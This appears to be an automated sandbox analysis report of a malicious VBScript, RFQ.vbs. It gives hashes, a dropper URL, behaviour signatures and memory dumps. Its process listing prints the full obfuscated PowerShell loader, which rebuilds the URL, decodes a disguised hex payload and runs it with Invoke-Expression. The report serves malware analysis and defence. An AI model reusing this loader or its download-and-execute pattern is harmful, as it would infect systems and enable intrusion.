a078a2a795317c2e46fbb857f9f2cda679731bf8276f19a8d9c2fb2b3c076f27

General

Target

RFQ.vbs
Size

7KB
MD5

344aaf64e1d6be52690b5006b4e7e407
SHA1

7d23e39c1aefae326ec42b82bdfdcae504d2662f
SHA256

a078a2a795317c2e46fbb857f9f2cda679731bf8276f19a8d9c2fb2b3c076f27
SHA512

c2064b2c5dd9cc8ba22f9b9136e71eabcfbd16b89d8d0ec3cd7b6945d4244045ebe7fe22450728c0de5ce2278926c8444dd2a043c82471a34f9ae43932a4b8f3

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://13.112.210.240/bypass.txt

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

660 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 660 powershell.exe

pid	process
660	powershell.exe

description	pid	process
Token: SeDebugPrivilege	660	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1616 wrote to memory of 660	1616	WScript.exe	powershell.exe
PID 1616 wrote to memory of 660	1616	WScript.exe	powershell.exe
PID 1616 wrote to memory of 660	1616	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RFQ.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13WSEDRFGTYHUJIK112WSEDRFGTYHUJIK210WSEDRFGTYHUJIK240/bypassWSEDRFGTYHUJIKtxt'.Replace('WSEDRFGTYHUJIK','.');$SOS='%!SXDCFVGBHNJ!5SXDCFVGBHNJ!!SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ!dSXDCFVGBHNJ!bSXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ*eSXDCFVGBHNJ!5SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ!5SXDCFVGBHNJ*%SXDCFVGBHNJ!3SXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ5!SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ7!SXDCFVGBHNJ%eSXDCFVGBHNJ57SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ*cSXDCFVGBHNJ!9SXDCFVGBHNJ!5SXDCFVGBHNJ!eSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ!bSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ!!SXDCFVGBHNJ!fSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ*1SXDCFVGBHNJ!!SXDCFVGBHNJ53SXDCFVGBHNJ5!SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ!7SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%aSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ57SXDCFVGBHNJ*eSXDCFVGBHNJ!cSXDCFVGBHNJ*fSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ7%SXDCFVGBHNJ!9SXDCFVGBHNJ*eSXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ57SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!3SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ59SXDCFVGBHNJ!8SXDCFVGBHNJ55SXDCFVGBHNJ!aSXDCFVGBHNJ!9SXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ3dSXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ*0SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%8SXDCFVGBHNJ*eSXDCFVGBHNJ*0SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ*0SXDCFVGBHNJ*3SXDCFVGBHNJ*0SXDCFVGBHNJ5!SXDCFVGBHNJ%0SXDCFVGBHNJ%!SXDCFVGBHNJ!5SXDCFVGBHNJ!!SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ!dSXDCFVGBHNJ!bSXDCFVGBHNJ!!SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ%9SXDCFVGBHNJ%7SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%dSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ*5SXDCFVGBHNJ*0SXDCFVGBHNJ57SXDCFVGBHNJ*0SXDCFVGBHNJ%dSXDCFVGBHNJ!fSXDCFVGBHNJ*%SXDCFVGBHNJ*aSXDCFVGBHNJ*0SXDCFVGBHNJ!5SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ5%SXDCFVGBHNJ*5SXDCFVGBHNJ70SXDCFVGBHNJ*cSXDCFVGBHNJ*1SXDCFVGBHNJ*3SXDCFVGBHNJ*5SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3cSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ3eSXDCFVGBHNJ%7SXDCFVGBHNJ%cSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%9SXDCFVGBHNJ%eSXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!eSXDCFVGBHNJ!aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!%SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ!bSXDCFVGBHNJ%8SXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ5aSXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!3SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3bSXDCFVGBHNJ0aSXDCFVGBHNJ%*SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ%8SXDCFVGBHNJ%!SXDCFVGBHNJ53SXDCFVGBHNJ57SXDCFVGBHNJ58SXDCFVGBHNJ!!SXDCFVGBHNJ!5SXDCFVGBHNJ!3SXDCFVGBHNJ5%SXDCFVGBHNJ!*SXDCFVGBHNJ!7SXDCFVGBHNJ59SXDCFVGBHNJ!8SXDCFVGBHNJ55SXDCFVGBHNJ!aSXDCFVGBHNJ!9SXDCFVGBHNJ53SXDCFVGBHNJ!!SXDCFVGBHNJ!*SXDCFVGBHNJ5*SXDCFVGBHNJ!7SXDCFVGBHNJ!8SXDCFVGBHNJ!aSXDCFVGBHNJ%0SXDCFVGBHNJ%dSXDCFVGBHNJ!aSXDCFVGBHNJ*fSXDCFVGBHNJ*9SXDCFVGBHNJ*eSXDCFVGBHNJ%0SXDCFVGBHNJ%7SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ7cSXDCFVGBHNJ%*SXDCFVGBHNJ%8SXDCFVGBHNJ%7SXDCFVGBHNJ!9SXDCFVGBHNJ%7SXDCFVGBHNJ%bSXDCFVGBHNJ%7SXDCFVGBHNJ!5SXDCFVGBHNJ58SXDCFVGBHNJ%7SXDCFVGBHNJ%9SXDCFVGBHNJ3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'SXDCFVGBHNJ' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:660

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/660-55-0x0000000000000000-mapping.dmp

Download
memory/660-57-0x000007FEF2950000-0x000007FEF34AD000-memory.dmp

Filesize
11.4MB

Download
memory/660-58-0x0000000002540000-0x0000000002542000-memory.dmp

Filesize
8KB

Download
memory/660-59-0x0000000002542000-0x0000000002544000-memory.dmp

Filesize
8KB

Download
memory/660-60-0x0000000002544000-0x0000000002547000-memory.dmp

Filesize
12KB

Download
memory/660-61-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/660-62-0x000000000254B000-0x000000000256A000-memory.dmp

Filesize
124KB

Download
memory/1616-54-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing